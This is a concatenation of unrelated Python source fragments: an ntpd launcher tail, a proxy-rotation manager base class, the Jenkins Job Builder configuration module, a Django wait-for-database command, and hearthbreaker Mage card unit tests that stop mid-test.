config_file.close()
config_template.close()
# We may eventually need to specify the -I option here to bind ntpd to the
# backchannel network's interface.
#
# The -N option causes ntpd to run at the highest possible priority so that
# the time is as accurate as possible.
subprocess.Popen(['/usr/sbin/ntpd', '-c',
os.path.join(NTP_DIR, 'ntp.client.conf'),
'-l', os.path.join(NTP_DIR, 'ntp.log'), '-N'])
|
class JobService:
def update_status(self):
pass
|
'''
Implements the base class for proxy managers. Inherit from it to quickly create managers backed by different proxy APIs.
'''
from pytimeparse.timeparse import timeparse
import datetime
from collections import deque
class ProxyManager():
def __init__(
self,
blacklist_cooldown='8hr',
reuse_cooldown='10m'
):
self._proxy_list = deque([])
self._proxy_hist_dict = {}
self.blacklist_cooldown = timeparse(blacklist_cooldown)
self.reuse_cooldown = timeparse(reuse_cooldown)
self.grab_proxies_from_api()
def grab_proxies_from_api(self):
pass
def check_proxy(self, proxy):
pass
def grab_proxy(self):
pass
def blacklist_proxy(self, proxy):
self._proxy_hist_dict[proxy]['blacklist_time'] = datetime.datetime.now()
def log_proxy_request(self, proxy):
self._proxy_hist_dict[proxy]['last_request_time'] = datetime.datetime.now()
self._proxy_hist_dict[proxy]['request_count'] += 1
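# --- Illustrative sketch (not part of the base class) ---
# A minimal subclass showing the intended extension points. The hard-coded
# proxy list stands in for a real provider API call and is purely an
# assumption for illustration.
class StaticListProxyManager(ProxyManager):
    def grab_proxies_from_api(self):
        # A real manager would fetch this list from its provider's API.
        for proxy in ('10.0.0.1:8080', '10.0.0.2:8080'):
            self._proxy_list.append(proxy)
            self._proxy_hist_dict[proxy] = {
                'blacklist_time': None,
                'last_request_time': None,
                'request_count': 0,
            }
    def grab_proxy(self):
        # Rotate through the deque; cooldown checks are omitted for brevity.
        if not self._proxy_list:
            return None
        proxy = self._proxy_list.popleft()
        self._proxy_list.append(proxy)
        self.log_proxy_request(proxy)
        return proxy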
|
#!/usr/bin/env python
# Copyright (C) 2015 Wayne Warren
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Manage JJB Configuration sources, defaults, and access.
from collections import defaultdict
import io
import logging
import os
from six.moves import configparser, StringIO
from six import PY2
from jenkins_jobs import builder
from jenkins_jobs.errors import JJBConfigException
from jenkins_jobs.errors import JenkinsJobsException
__all__ = [
"JJBConfig"
]
logger = logging.getLogger(__name__)
DEFAULT_CONF = """
[job_builder]
keep_descriptions=False
ignore_cache=False
recursive=False
exclude=.*
allow_duplicates=False
allow_empty_variables=False
retain_anchors=False
# other named sections could be used in addition to the implicit [jenkins]
# if you have multiple jenkins servers.
[jenkins]
url=http://localhost:8080/
query_plugins_info=False
"""
CONFIG_REQUIRED_MESSAGE = ("A valid configuration file is required. "
"No configuration file passed.")
DEPRECATED_PLUGIN_CONFIG_SECTION_MESSAGE = (
"Defining plugin configuration using a [{plugin}] section in your config"
" file is deprecated. The recommended way to define plugins now is by"
" using a [plugin \"{plugin}\"] section"
)
_NOTSET = object()
class JJBConfig(object):
def __init__(self, config_filename=None,
config_file_required=False,
config_section='jenkins'):
"""
The JJBConfig class is intended to encapsulate and resolve priority
between all sources of configuration for the JJB library. This allows
the various sources of configuration to provide a consistent accessor
interface regardless of where they are used.
It also allows users of JJB-as-an-API to create minimally valid
configuration and easily make minor modifications to default values
without strictly adhering to the confusing setup (see the _setup
method, the behavior of which largely lived in the cmd.execute method
previously) necessary for the jenkins-jobs command line tool.
:arg str config_filename: Name of configuration file on which to base
this config object.
:arg bool config_file_required: Allows users of the JJBConfig class to
decide whether or not it's really necessary for a config file to be
passed in when creating an instance. This has two effects on the
behavior of JJBConfig initialization:
* It determines whether or not we try "local" and "global" config
files.
* It determines whether or not failure to read some config file
will raise an exception or simply print a warning message
indicating that no config file was found.
"""
config_parser = self._init_defaults()
global_conf = '/etc/jenkins_jobs/jenkins_jobs.ini'
user_conf = os.path.join(os.path.expanduser('~'), '.config',
'jenkins_jobs', 'jenkins_jobs.ini')
local_conf = os.path.join(os.path.dirname(__file__),
'jenkins_jobs.ini')
conf = None
if config_filename is not None:
conf = config_filename
else:
if os.path.isfile(local_conf):
conf = local_conf
elif os.path.isfile(user_conf):
conf = user_conf
else:
conf = global_conf
if config_file_required and conf is None:
raise JJBConfigException(CONFIG_REQUIRED_MESSAGE)
config_fp = None
if conf is not None:
try:
config_fp = self._read_config_file(conf)
except JJBConfigException:
if config_file_required:
raise JJBConfigException(CONFIG_REQUIRED_MESSAGE)
else:
logger.warning("Config file, {0}, not found. Using "
"default config values.".format(conf))
if config_fp is not None:
if PY2:
config_parser.readfp(config_fp)
else:
config_parser.read_file(config_fp)
self.config_parser = config_parser
self._section = config_section
self.print_job_urls = False
self.jenkins = defaultdict(None)
self.builder = defaultdict(None)
self.yamlparser = defaultdict(None)
self._setup()
self._handle_deprecated_hipchat_config()
def _init_defaults(self):
""" Initialize default configuration values using DEFAULT_CONF
"""
config = configparser.ConfigParser()
# Load default config always
if PY2:
config.readfp(StringIO(DEFAULT_CONF))
else:
config.read_file(StringIO(DEFAULT_CONF))
return config
def _read_config_file(self, config_filename):
""" Given path to configuration file, read it in as a ConfigParser
object and return that object.
"""
if os.path.isfile(config_filename):
self.__config_file = config_filename # remember file we read from
logger.debug("Reading config from {0}".format(config_filename))
config_fp = io.open(config_filename, 'r', encoding='utf-8')
else:
raise JJBConfigException(
"A valid configuration file is required. "
"\n{0} is not valid.".format(config_filename))
return config_fp
def _handle_deprecated_hipchat_config(self):
config = self.config_parser
if config.has_section('hipchat'):
if config.has_section('plugin "hipchat"'):
logger.warning(
"Both [hipchat] and [plugin \"hipchat\"] sections "
"defined, legacy [hipchat] section will be ignored."
)
else:
logger.warning(
"[hipchat] section is deprecated and should be moved to a "
"[plugins \"hipchat\"] section instead as the [hipchat] "
"section will be ignored in the future."
)
config.add_section('plugin "hipchat"')
for option in config.options("hipchat"):
config.set('plugin "hipchat"', option,
config.get("hipchat", option))
config.remove_section("hipchat")
        # remove the need to reference the jenkins section when using the
        # hipchat plugin. Moving to the backports configparser would allow
        # extended interpolation, so plugins would no longer need information
        # directly from the jenkins section within code; variables in the
        # config file could refer to it instead.
if (config.has_section('plugin "hipchat"') and
not config.has_option('plugin "hipchat"', 'url')):
config.set('plugin "hipchat"', "url", config.get('jenkins', 'url'))
def _setup(self):
config = self.config_parser
logger.debug("Config: {0}".format(config))
# check the ignore_cache setting
ignore_cache = False
if config.has_option(self._section, 'ignore_cache'):
logger.warning("ignore_cache option should be moved to the "
"[job_builder] section in the config file, the "
"one specified in the [jenkins] section will be "
"ignored in the future")
ignore_cache = config.getboolean(self._section, 'ignore_cache')
elif config.has_option('job_builder', 'ignore_cache'):
ignore_cache = config.getboolean('job_builder', 'ignore_cache')
self.builder['ignore_cache'] = ignore_cache
# check the flush_cache setting
flush_cache = False
if config.has_option('job_builder', 'flush_cache'):
flush_cache = config.getboolean('job_builder', 'flush_cache')
self.builder['flush_cache'] = flush_cache
# check the print_job_urls setting
if config.has_option('job_builder', 'print_job_urls'):
self.print_job_urls = config.getboolean('job_builder',
'print_job_urls')
# Jenkins supports access as an anonymous user, which can be used to
# ensure read-only behaviour when querying the version of plugins
# installed for test mode to generate XML output matching what will be
        # uploaded. To enable this, pass 'None' as the value for user and
        # password to python-jenkins.
#
# catching 'TypeError' is a workaround for python 2.6 interpolation
# error
# https://bugs.launchpad.net/openstack-ci/+bug/1259631
try:
user = config.get(self._section, 'user')
except (TypeError, configparser.NoOptionError):
user = None
self.jenkins['user'] = user
try:
password = config.get(self._section, 'password')
except (TypeError, configparser.NoOptionError):
password = None
self.jenkins['password'] = password
# None -- no timeout, blocking mode; same as setblocking(True)
# 0.0 -- non-blocking mode; same as setblocking(False) <--- default
# > 0 -- timeout mode; operations time out after timeout seconds
# < 0 -- illegal; raises an exception
# to retain the default must use
# "timeout=jenkins_jobs.builder._DEFAULT_TIMEOUT" or not set timeout at
# all.
try:
timeout = config.getfloat(self._section, 'timeout')
        except ValueError:
raise JenkinsJobsException("Jenkins timeout config is invalid")
except (TypeError, configparser.NoOptionError):
timeout = builder._DEFAULT_TIMEOUT
self.jenkins['timeout'] = timeout
plugins_info = None
if (config.has_option(self._section, 'query_plugins_info') and
not config.getboolean(self._section, "query_plugins_info")):
logger.debug("Skipping plugin info retrieval")
plugins_info = []
self.builder['plugins_info'] = plugins_info
self.recursive = config.getboolean('job_builder', 'recursive')
self.excludes = config.get('job_builder', 'exclude').split(os.pathsep)
# The way we want to do things moving forward:
self.jenkins['url'] = config.get(self._section, 'url')
self.builder['print_job_urls'] = self.print_job_urls
# keep descriptions ? (used by yamlparser)
keep_desc = False
if (config and config.has_section('job_builder') and
config.has_option('job_builder', 'keep_descriptions')):
keep_desc = config.getboolean('job_builder',
'keep_descriptions')
self.yamlparser['keep_descriptions'] = keep_desc
# figure out the include path (used by yamlparser)
path = ["."]
if (config and config.has_section('job_builder') and
config.has_option('job_builder', 'include_path')):
path = config.get('job_builder',
'include_path').split(':')
self.yamlparser['include_path'] = path
# allow duplicates?
allow_duplicates = False
if config and config.has_option('job_builder', 'allow_duplicates'):
allow_duplicates = config.getboolean('job_builder',
'allow_duplicates')
self.yamlparser['allow_duplicates'] = allow_duplicates
# allow empty variables?
self.yamlparser['allow_empty_variables'] = (
config and config.has_section('job_builder') and
config.has_option('job_builder', 'allow_empty_variables') and
config.getboolean('job_builder', 'allow_empty_variables'))
# retain anchors across files?
retain_anchors = False
if config and config.has_option('job_builder', 'retain_anchors'):
retain_anchors = config.getboolean('job_builder',
'retain_anchors')
self.yamlparser['retain_anchors'] = retain_anchors
update = None
if (config and config.has_section('job_builder') and
config.has_option('job_builder', 'update')):
update = config.get('job_builder', 'update')
self.builder['update'] = update
def validate(self):
# Inform the user as to what is likely to happen, as they may specify
# a real jenkins instance in test mode to get the plugin info to check
# the XML generated.
if self.jenkins['user'] is None and self.jenkins['password'] is None:
logger.info("Will use anonymous access to Jenkins if needed.")
elif ((self.jenkins['user'] is not None and
self.jenkins['password'] is None) or
(self.jenkins['user'] is None and
self.jenkins['password'] is not None)):
raise JenkinsJobsException(
"Cannot authenticate to Jenkins with only one of User and "
"Password provided, please check your configuration."
)
if (self.builder['plugins_info'] is not None and
not isinstance(self.builder['plugins_info'], list)):
raise JenkinsJobsException("plugins_info must contain a list!")
def get_module_config(self, section, key, default=None):
""" Given a section name and a key value, return the value assigned to
the key in the JJB .ini file if it exists, otherwise emit a warning
indicating that the value is not set. Default value returned if no
value is set in the file will be a blank string.
"""
result = default
try:
result = self.config_parser.get(
section, key
)
except (configparser.NoSectionError, configparser.NoOptionError,
JenkinsJobsException) as e:
# use of default ignores missing sections/options
if result is None:
logger.warning(
"You didn't set a %s neither in the yaml job definition "
"nor in the %s section, blank default value will be "
"applied:\n%s", key, section, e)
return result
def get_plugin_config(self, plugin, key, default=None):
value = self.get_module_config('plugin "{}"'.format(plugin), key,
default)
# Backwards compatibility for users who have not switched to the new
# plugin configuration format in their config. This code should be
# removed in future versions of JJB after 2.0.
if value is default:
old_value = self.get_module_config(plugin, key, _NOTSET)
# only log warning if detected a plugin config setting.
if old_value is not _NOTSET:
value = old_value
logger.warning(
DEPRECATED_PLUGIN_CONFIG_SECTION_MESSAGE.format(
plugin=plugin))
return value
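# --- Illustrative usage sketch (not part of the module) ---
# Builds a config object without an ini file (the defaults from DEFAULT_CONF
# apply, since reading the global config is allowed to fail), overrides one
# value, and validates it. The URL below is an assumption for illustration.
if __name__ == "__main__":
    jjb_config = JJBConfig()
    jjb_config.jenkins['url'] = 'http://jenkins.example.com:8080/'
    jjb_config.validate()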
|
import time
from django.core.management.base import BaseCommand
from django.db import connections
from django.db.utils import OperationalError
class Command(BaseCommand):
def handle(self, *args, **options):
self.stdout.write('Waiting for the database...')
        db_catch = False
        while not db_catch:
            try:
                # Force a real connection attempt; merely indexing
                # `connections` returns a lazy wrapper and never connects,
                # so it would never raise OperationalError.
                connections['default'].ensure_connection()
                db_catch = True
except OperationalError:
self.stderr.write(
'The database is unavailable, trying one more time...'
)
time.sleep(1)
self.stdout.write(self.style.SUCCESS('Database is ready'))
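# Usage sketch: assuming this module lives at
# <app>/management/commands/wait_for_db.py, it can be run with
#   python manage.py wait_for_db
# e.g. as a container entrypoint step before applying migrations.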
|
import random
import unittest
from hearthbreaker.agents.basic_agents import PredictableAgent, DoNothingAgent
from hearthbreaker.constants import CHARACTER_CLASS, MINION_TYPE
from hearthbreaker.engine import Game
from hearthbreaker.replay import playback, Replay
from tests.agents.testing_agents import CardTestingAgent, OneCardPlayingAgent, EnemySpellTestingAgent, \
MinionAttackingAgent, PlayAndAttackAgent
from tests.testing_utils import generate_game_for, StackedDeck
from hearthbreaker.cards import *
class TestMage(unittest.TestCase):
def setUp(self):
random.seed(1857)
def test_ArcaneMissiles(self):
game = generate_game_for(MogushanWarden, ArcaneMissiles, OneCardPlayingAgent, CardTestingAgent)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(27, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
game.play_single_turn()
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Mogu'shan Warden", game.current_player.minions[0].card.name)
game.play_single_turn()
# The random numbers work so that the arcane missiles hit thrice on each target
self.assertEqual(9, game.other_player.hero.health)
self.assertEqual(4, game.other_player.minions[0].health)
def test_ArcaneMissilesWithSpellPower(self):
game = playback(Replay("tests/replays/card_tests/ArcaneMissilesWithSpellDamage.hsreplay"))
game.start()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(2, game.other_player.minions[0].calculate_max_health())
self.assertEqual(27, game.other_player.hero.health)
return game
def test_WaterElemental(self):
game = generate_game_for(WaterElemental, StonetuskBoar, PredictableAgent, DoNothingAgent)
for turn in range(0, 11):
game.play_single_turn()
self.assertEqual(25, game.other_player.hero.health)
self.assertFalse(game.other_player.hero.frozen)
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
self.assertEqual(6, game.current_player.minions[0].health)
self.assertEqual("Water Elemental", game.current_player.minions[0].card.name)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(22, game.other_player.hero.health)
        # The enemy hero was frozen by this turn's attack; freeze only wears
        # off at the end of the frozen player's own turn
self.assertTrue(game.other_player.hero.frozen)
# Now make sure that attacking the Water Elemental directly will freeze a character
random.seed(1857)
game = generate_game_for(WaterElemental, IronbarkProtector, OneCardPlayingAgent, PredictableAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(5, game.other_player.minions[0].health)
# The player won't have taken damage because of armor, but should still be frozen
self.assertEqual(30, game.current_player.hero.health)
self.assertTrue(game.current_player.hero.frozen)
game.play_single_turn()
game.play_single_turn()
# The player should still be frozen from last turn, and so shouldn't have attacked
self.assertEqual(30, game.current_player.hero.health)
def test_IceLance(self):
game = generate_game_for(IceLance, OasisSnapjaw, CardTestingAgent, OneCardPlayingAgent)
game.play_single_turn()
self.assertTrue(game.other_player.hero.frozen)
self.assertEqual(30, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertTrue(game.other_player.hero.frozen)
self.assertEqual(26, game.other_player.hero.health)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertTrue(game.other_player.minions[0].frozen)
self.assertEqual(7, game.other_player.minions[0].health)
def test_ManaWyrm(self):
deck1 = StackedDeck([ManaWyrm(), IceLance(), ManaWyrm(), IceLance(), IceLance(), IceLance()],
CHARACTER_CLASS.MAGE)
deck2 = StackedDeck([IronbeakOwl()], CHARACTER_CLASS.PALADIN)
game = Game([deck1, deck2], [CardTestingAgent(), OneCardPlayingAgent()])
game.pre_game()
game.current_player = 1
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(1, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
self.assertEqual("Mana Wyrm", game.current_player.minions[0].card.name)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(1, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
self.assertEqual(2, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[1].health)
self.assertEqual(3, game.current_player.minions[1].calculate_max_health())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(1, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
self.assertEqual(5, game.current_player.minions[1].calculate_attack())
self.assertEqual(3, game.current_player.minions[1].health)
self.assertEqual(3, game.current_player.minions[1].calculate_max_health())
def test_MirrorImage(self):
game = generate_game_for(MirrorImage, StonetuskBoar, CardTestingAgent, DoNothingAgent)
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(0, game.current_player.minions[0].calculate_attack())
self.assertEqual(2, game.current_player.minions[0].health)
self.assertTrue(game.current_player.minions[0].taunt)
self.assertEqual("Mirror Image", game.current_player.minions[0].card.name)
self.assertEqual(0, game.current_player.minions[0].card.mana)
self.assertEqual(0, game.current_player.minions[1].calculate_attack())
self.assertEqual(2, game.current_player.minions[1].health)
self.assertTrue(game.current_player.minions[1].taunt)
self.assertEqual("Mirror Image", game.current_player.minions[1].card.name)
self.assertEqual(0, game.current_player.minions[1].card.mana)
def test_ArcaneExplosion(self):
game = generate_game_for(BloodfenRaptor, ArcaneExplosion, OneCardPlayingAgent, CardTestingAgent)
game.play_single_turn()
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(30, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(30, game.other_player.hero.health)
def test_Frostbolt(self):
game = generate_game_for(OasisSnapjaw, Frostbolt, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 4):
game.play_single_turn()
self.assertTrue(game.other_player.hero.frozen)
self.assertEqual(27, game.other_player.hero.health)
for turn in range(0, 4):
game.play_single_turn()
self.assertEqual(24, game.other_player.hero.health)
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertTrue(game.other_player.minions[0].frozen)
def test_SorcerersApprentice(self):
game = generate_game_for([SorcerersApprentice, ArcaneMissiles, SorcerersApprentice, Frostbolt, Frostbolt,
Frostbolt], StonetuskBoar, CardTestingAgent, DoNothingAgent)
game.play_single_turn()
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
self.assertEqual(2, game.current_player.minions[0].health)
self.assertEqual("Sorcerer's Apprentice", game.current_player.minions[0].card.name)
# Arcane missiles should also have been played, since it is now free
self.assertEqual(27, game.other_player.hero.health)
# Make sure the other frostbolts have been properly reduced
self.assertEqual(1, game.current_player.hand[1].mana_cost())
self.assertEqual(1, game.current_player.hand[2].mana_cost())
game.play_single_turn()
game.play_single_turn()
# Both Sorcerer's Apprentices are killed by friendly Frostbolts.
self.assertEqual(0, len(game.current_player.minions))
# Make sure that the cards in hand are no longer reduced
self.assertEqual(2, game.current_player.hand[0].mana_cost())
def test_ArcaneIntellect(self):
game = generate_game_for(ArcaneIntellect, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(7, len(game.current_player.hand))
def test_FrostNova(self):
game = generate_game_for(FrostNova, StonetuskBoar, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 5):
game.play_single_turn()
for minion in game.other_player.minions:
self.assertTrue(minion.frozen)
self.assertFalse(game.other_player.hero.frozen)
def test_Counterspell(self):
game = generate_game_for(Counterspell, Frostbolt, CardTestingAgent, CardTestingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual("Counterspell", game.current_player.secrets[0].name)
game.play_single_turn()
self.assertFalse(game.other_player.hero.frozen)
self.assertEqual(27, game.other_player.hero.health)
# Ensure that secrets are being removed after being revealed
self.assertEqual(0, len(game.other_player.secrets))
def test_IceBarrier(self):
game = generate_game_for(IceBarrier, StonetuskBoar, CardTestingAgent, PredictableAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual("Ice Barrier", game.current_player.secrets[0].name)
game.play_single_turn()
# only one minion because PredictableAgent will shoot its own minions if there isn't anything else to shoot.
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(7, game.other_player.hero.armor)
# Attacked twice on the first turn, then fireballed before getting the armor up
self.assertEqual(27, game.other_player.hero.health)
# Make sure we can't have two identical secrets at the same time
random.seed(1857)
game = generate_game_for(IceBarrier, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.secrets))
self.assertEqual("Ice Barrier", game.other_player.secrets[0].name)
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual("Ice Barrier", game.current_player.secrets[0].name)
def test_IceBlock(self):
game = generate_game_for([IceBlock, Deathwing], Frostbolt, CardTestingAgent, CardTestingAgent)
for turn in range(0, 12):
game.play_single_turn()
self.assertEqual(game.other_player.hero.health, 3)
self.assertEqual(1, len(game.other_player.secrets))
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, game.other_player.hero.health)
self.assertEqual(0, len(game.other_player.secrets))
game.play_single_turn()
game.play_single_turn()
self.assertTrue(game.game_ended)
def test_MirrorEntity(self):
game = generate_game_for([StonetuskBoar, MirrorEntity], IronfurGrizzly, CardTestingAgent, OneCardPlayingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual("Mirror Entity", game.current_player.secrets[0].name)
game.play_single_turn()
self.assertEqual(2, len(game.other_player.minions))
self.assertEqual("Ironfur Grizzly", game.other_player.minions[1].card.name)
self.assertEqual(game.other_player, game.other_player.minions[1].player)
self.assertEqual(1, game.other_player.minions[1].index)
def test_Spellbender(self):
game = generate_game_for([Spellbender, Wisp], Moonfire, CardTestingAgent, CardTestingAgent)
for turn in range(0, 6):
game.play_single_turn()
# The moonfire should have been re-directed to the Spellbender, which should have taken one damage
self.assertEqual(2, len(game.other_player.minions))
self.assertEqual(2, game.other_player.minions[1].health)
self.assertEqual(1, game.other_player.minions[1].calculate_attack())
self.assertEqual("Spellbender", game.other_player.minions[1].card.name)
# Now make sure it won't work when the hero is targeted
random.seed(1857)
game = generate_game_for(Spellbender, Moonfire, CardTestingAgent, CardTestingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(1, len(game.other_player.secrets))
self.assertEqual(23, game.other_player.hero.health)
# Now make sure it doesn't activate when a non-targeted spell is used
random.seed(1857)
game = generate_game_for(Spellbender, ArcaneIntellect, CardTestingAgent, CardTestingAgent)
for turn in range(0, 6):
game.play_single_turn()
# The arcane intellect should not have caused the Spellbender to activate
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(1, len(game.other_player.secrets))
def test_SpellbenderFullBoard(self):
game = generate_game_for([Spellbender, Onyxia], Assassinate, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(17):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(7, len(game.current_player.minions))
game.play_single_turn()
self.assertEqual(6, len(game.other_player.minions))
self.assertEqual(1, len(game.other_player.secrets))
def test_Spellbender_full_board_target_hero(self):
game = generate_game_for(BaneOfDoom, [Wisp, Wisp, Wisp, Wisp, Wisp, Wisp, Wisp, Spellbender],
OneCardPlayingAgent, CardTestingAgent)
for turn in range(10):
game.play_single_turn()
self.assertEqual(7, len(game.current_player.minions))
self.assertEqual(1, len(game.current_player.secrets))
game.other_player.agent.choose_target = lambda targets: game.players[1].hero
game.play_single_turn()
self.assertEqual(7, len(game.other_player.minions))
self.assertEqual(28, game.other_player.hero.health)
self.assertEqual(1, len(game.other_player.secrets))
def test_Spellbender_target_hero_and_attack(self):
game = generate_game_for([Spellbender, OasisSnapjaw], [LavaBurst, Wisp, Loatheb],
OneCardPlayingAgent, PlayAndAttackAgent)
for turn in range(5):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(0, len(game.other_player.minions))
game.play_single_turn()
self.assertEqual(1, len(game.other_player.secrets))
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(25, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(25, game.other_player.hero.health)
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(6, game.other_player.minions[0].health)
self.assertEqual(1, len(game.other_player.secrets))
def test_Vaporize(self):
game = generate_game_for(Vaporize, FaerieDragon, CardTestingAgent, MinionAttackingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(0, len(game.other_player.secrets))
self.assertEqual(30, game.other_player.hero.health)
random.seed(1857)
game = generate_game_for(Vaporize, Swipe, CardTestingAgent, PredictableAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(28, game.other_player.hero.health)
self.assertEqual(1, len(game.other_player.secrets))
self.assertFalse(game.current_player.hero.dead)
def test_KirinTorMage(self):
game = generate_game_for([KirinTorMage, Vaporize, Spellbender], StonetuskBoar,
CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual("Vaporize", game.current_player.secrets[0].name)
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Kirin Tor Mage", game.current_player.minions[0].card.name)
self.assertEqual(3, game.current_player.hand[0].mana_cost())
self.assertEqual("Spellbender", game.current_player.hand[0].name)
random.seed(1857)
game = generate_game_for([KirinTorMage, Vaporize], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(0, len(game.current_player.secrets))
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Kirin Tor Mage", game.current_player.minions[0].card.name)
self.assertEqual(3, game.current_player.hand[2].mana_cost())
self.assertEqual("Vaporize", game.current_player.hand[2].name)
def test_EtherealArcanist(self):
game = generate_game_for([Spellbender, EtherealArcanist], StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.secrets))
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(5, game.current_player.minions[0].calculate_attack())
self.assertEqual(5, game.current_player.minions[0].health)
self.assertEqual(5, game.current_player.minions[0].calculate_max_health())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(7, game.current_player.minions[0].calculate_attack())
self.assertEqual(7, game.current_player.minions[0].health)
self.assertEqual(7, game.current_player.minions[0].calculate_max_health())
game.current_player.minions[0].silence()
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
# Test when the player has no secrets at all
random.seed(1857)
game = generate_game_for(EtherealArcanist, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
self.assertEqual(3, game.current_player.minions[0].health)
self.assertEqual(3, game.current_player.minions[0].calculate_max_health())
def test_ConeOfCold(self):
game = generate_game_for(ConeOfCold, [StonetuskBoar, BloodfenRaptor, BloodfenRaptor], CardTestingAgent,
OneCardPlayingAgent)
for turn in range(0, 6):
game.play_single_turn()
self.assertEqual(3, len(game.current_player.minions))
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertTrue(game.other_player.minions[0].frozen)
self.assertEqual(1, game.other_player.minions[0].health)
self.assertTrue(game.other_player.minions[1].frozen)
self.assertEqual(1, game.other_player.minions[1].health)
self.assertFalse(game.other_player.minions[2].frozen)
self.assertEqual(1, game.other_player.minions[2].health)
self.assertEqual(30, game.other_player.hero.health)
# Now check to ensure that it will work when targeting the other end of the minion list
game.current_player.agent.choose_target = lambda targets: targets[len(targets) - 1]
game.play_single_turn()
game.play_single_turn()
# Neither of the minions which survive Cone of Cold will be frozen, since they weren't touched this round
self.assertEqual(2, len(game.other_player.minions))
self.assertFalse(game.other_player.minions[0].frozen)
self.assertFalse(game.other_player.minions[1].frozen)
def test_Fireball(self):
game = generate_game_for([Fireball, KoboldGeomancer], StonetuskBoar, EnemySpellTestingAgent, DoNothingAgent)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(24, game.other_player.hero.health)
for turn in range(0, 4):
game.play_single_turn()
